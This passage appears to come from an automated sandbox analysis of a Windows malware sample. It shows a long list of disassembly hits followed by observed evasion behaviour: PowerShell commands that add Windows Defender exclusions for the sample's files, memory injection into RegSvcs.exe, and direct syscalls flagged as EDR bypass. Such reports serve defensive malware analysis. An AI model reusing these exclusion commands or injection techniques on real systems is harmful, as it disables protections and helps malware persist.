                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171892A mov eax, dword ptr fs:[00000030h]10_2_0171892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171C912 mov eax, dword ptr fs:[00000030h]10_2_0171C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688918 mov eax, dword ptr fs:[00000030h]10_2_01688918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688918 mov eax, dword ptr fs:[00000030h]10_2_01688918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E908 mov eax, dword ptr fs:[00000030h]10_2_0170E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E908 mov eax, dword ptr fs:[00000030h]10_2_0170E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171E9E0 mov eax, dword ptr fs:[00000030h]10_2_0171E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C29F9 mov eax, dword ptr fs:[00000030h]10_2_016C29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C29F9 mov eax, dword ptr fs:[00000030h]10_2_016C29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175A9D3 mov eax, dword ptr fs:[00000030h]10_2_0175A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017269C0 mov eax, dword ptr fs:[00000030h]10_2_017269C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A9D0 mov eax, dword ptr fs:[00000030h]10_2_0169A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A9D0 mov eax, dword ptr fs:[00000030h]10_2_0169A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A9D0 mov eax, dword ptr fs:[00000030h]10_2_0169A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A9D0 mov eax, dword ptr fs:[00000030h]10_2_0169A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A9D0 mov eax, dword ptr fs:[00000030h]10_2_0169A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A9D0 mov eax, dword ptr fs:[00000030h]10_2_0169A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C49D0 mov eax, dword ptr fs:[00000030h]10_2_016C49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017189B3 mov esi, dword ptr fs:[00000030h]10_2_017189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017189B3 mov eax, dword ptr fs:[00000030h]10_2_017189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017189B3 mov eax, dword ptr fs:[00000030h]10_2_017189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016909AD mov eax, dword ptr fs:[00000030h]10_2_016909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016909AD mov eax, dword ptr fs:[00000030h]10_2_016909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A0 mov eax, dword ptr fs:[00000030h]10_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726870 mov eax, dword ptr fs:[00000030h]10_2_01726870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726870 mov eax, dword ptr fs:[00000030h]10_2_01726870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171E872 mov eax, dword ptr fs:[00000030h]10_2_0171E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171E872 mov eax, dword ptr fs:[00000030h]10_2_0171E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A2840 mov ecx, dword ptr fs:[00000030h]10_2_016A2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694859 mov eax, dword ptr fs:[00000030h]10_2_01694859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694859 mov eax, dword ptr fs:[00000030h]10_2_01694859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C0854 mov eax, dword ptr fs:[00000030h]10_2_016C0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173483A mov eax, dword ptr fs:[00000030h]10_2_0173483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173483A mov eax, dword ptr fs:[00000030h]10_2_0173483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA830 mov eax, dword ptr fs:[00000030h]10_2_016CA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2835 mov eax, dword ptr fs:[00000030h]10_2_016B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2835 mov eax, dword ptr fs:[00000030h]10_2_016B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2835 mov eax, dword ptr fs:[00000030h]10_2_016B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2835 mov ecx, dword ptr fs:[00000030h]10_2_016B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2835 mov eax, dword ptr fs:[00000030h]10_2_016B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2835 mov eax, dword ptr fs:[00000030h]10_2_016B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171C810 mov eax, dword ptr fs:[00000030h]10_2_0171C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175A8E4 mov eax, dword ptr fs:[00000030h]10_2_0175A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC8F9 mov eax, dword ptr fs:[00000030h]10_2_016CC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC8F9 mov eax, dword ptr fs:[00000030h]10_2_016CC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE8C0 mov eax, dword ptr fs:[00000030h]10_2_016BE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017608C0 mov eax, dword ptr fs:[00000030h]10_2_017608C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171C89D mov eax, dword ptr fs:[00000030h]10_2_0171C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690887 mov eax, dword ptr fs:[00000030h]10_2_01690887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168CB7E mov eax, dword ptr fs:[00000030h]10_2_0168CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01762B57 mov eax, dword ptr fs:[00000030h]10_2_01762B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01762B57 mov eax, dword ptr fs:[00000030h]10_2_01762B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01762B57 mov eax, dword ptr fs:[00000030h]10_2_01762B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01762B57 mov eax, dword ptr fs:[00000030h]10_2_01762B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173EB50 mov eax, dword ptr fs:[00000030h]10_2_0173EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01738B42 mov eax, dword ptr fs:[00000030h]10_2_01738B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726B40 mov eax, dword ptr fs:[00000030h]10_2_01726B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726B40 mov eax, dword ptr fs:[00000030h]10_2_01726B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175AB40 mov eax, dword ptr fs:[00000030h]10_2_0175AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688B50 mov eax, dword ptr fs:[00000030h]10_2_01688B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01744B4B mov eax, dword ptr fs:[00000030h]10_2_01744B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01744B4B mov eax, dword ptr fs:[00000030h]10_2_01744B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BEB20 mov eax, dword ptr fs:[00000030h]10_2_016BEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BEB20 mov eax, dword ptr fs:[00000030h]10_2_016BEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01758B28 mov eax, dword ptr fs:[00000030h]10_2_01758B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01758B28 mov eax, dword ptr fs:[00000030h]10_2_01758B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170EB1D mov eax, dword ptr fs:[00000030h]10_2_0170EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764B00 mov eax, dword ptr fs:[00000030h]10_2_01764B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171CBF0 mov eax, dword ptr fs:[00000030h]10_2_0171CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BEBFC mov eax, dword ptr fs:[00000030h]10_2_016BEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698BF0 mov eax, dword ptr fs:[00000030h]10_2_01698BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698BF0 mov eax, dword ptr fs:[00000030h]10_2_01698BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698BF0 mov eax, dword ptr fs:[00000030h]10_2_01698BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B0BCB mov eax, dword ptr fs:[00000030h]10_2_016B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B0BCB mov eax, dword ptr fs:[00000030h]10_2_016B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B0BCB mov eax, dword ptr fs:[00000030h]10_2_016B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173EBD0 mov eax, dword ptr fs:[00000030h]10_2_0173EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690BCD mov eax, dword ptr fs:[00000030h]10_2_01690BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690BCD mov eax, dword ptr fs:[00000030h]10_2_01690BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690BCD mov eax, dword ptr fs:[00000030h]10_2_01690BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01744BB0 mov eax, dword ptr fs:[00000030h]10_2_01744BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01744BB0 mov eax, dword ptr fs:[00000030h]10_2_01744BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0BBE mov eax, dword ptr fs:[00000030h]10_2_016A0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0BBE mov eax, dword ptr fs:[00000030h]10_2_016A0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170CA72 mov eax, dword ptr fs:[00000030h]10_2_0170CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170CA72 mov eax, dword ptr fs:[00000030h]10_2_0170CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CCA6F mov eax, dword ptr fs:[00000030h]10_2_016CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CCA6F mov eax, dword ptr fs:[00000030h]10_2_016CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CCA6F mov eax, dword ptr fs:[00000030h]10_2_016CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173EA60 mov eax, dword ptr fs:[00000030h]10_2_0173EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0A5B mov eax, dword ptr fs:[00000030h]10_2_016A0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0A5B mov eax, dword ptr fs:[00000030h]10_2_016A0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696A50 mov eax, dword ptr fs:[00000030h]10_2_01696A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BEA2E mov eax, dword ptr fs:[00000030h]10_2_016BEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CCA24 mov eax, dword ptr fs:[00000030h]10_2_016CCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CCA38 mov eax, dword ptr fs:[00000030h]10_2_016CCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B4A35 mov eax, dword ptr fs:[00000030h]10_2_016B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B4A35 mov eax, dword ptr fs:[00000030h]10_2_016B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171CA11 mov eax, dword ptr fs:[00000030h]10_2_0171CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CAAEE mov eax, dword ptr fs:[00000030h]10_2_016CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CAAEE mov eax, dword ptr fs:[00000030h]10_2_016CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E6ACC mov eax, dword ptr fs:[00000030h]10_2_016E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E6ACC mov eax, dword ptr fs:[00000030h]10_2_016E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E6ACC mov eax, dword ptr fs:[00000030h]10_2_016E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690AD0 mov eax, dword ptr fs:[00000030h]10_2_01690AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C4AD0 mov eax, dword ptr fs:[00000030h]10_2_016C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C4AD0 mov eax, dword ptr fs:[00000030h]10_2_016C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698AA0 mov eax, dword ptr fs:[00000030h]10_2_01698AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698AA0 mov eax, dword ptr fs:[00000030h]10_2_01698AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E6AA4 mov eax, dword ptr fs:[00000030h]10_2_016E6AA4
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtQueryInformationProcess: Direct from: 0x77392C26
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtResumeThread: Direct from: 0x77392FBCJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtWriteVirtualMemory: Direct from: 0x7739490CJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtCreateUserProcess: Direct from: 0x7739371CJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtAllocateVirtualMemory: Direct from: 0x77392BFC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtQuerySystemInformation: Direct from: 0x77392DFC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtReadFile: Direct from: 0x77392ADCJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtProtectVirtualMemory: Direct from: 0x77387B2E
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtDelayExecution: Direct from: 0x77392DDC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtWriteVirtualMemory: Direct from: 0x77392E3CJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtCreateMutant: Direct from: 0x773935CC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtResumeThread: Direct from: 0x773936AC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtMapViewOfSection: Direct from: 0x77392D1C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtOpenKeyEx: Direct from: 0x77392B9C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtSetInformationProcess: Direct from: 0x77392C5C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtProtectVirtualMemory: Direct from: 0x77392F9C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeNtNotifyChangeKey: Direct from: 0x77393C2C
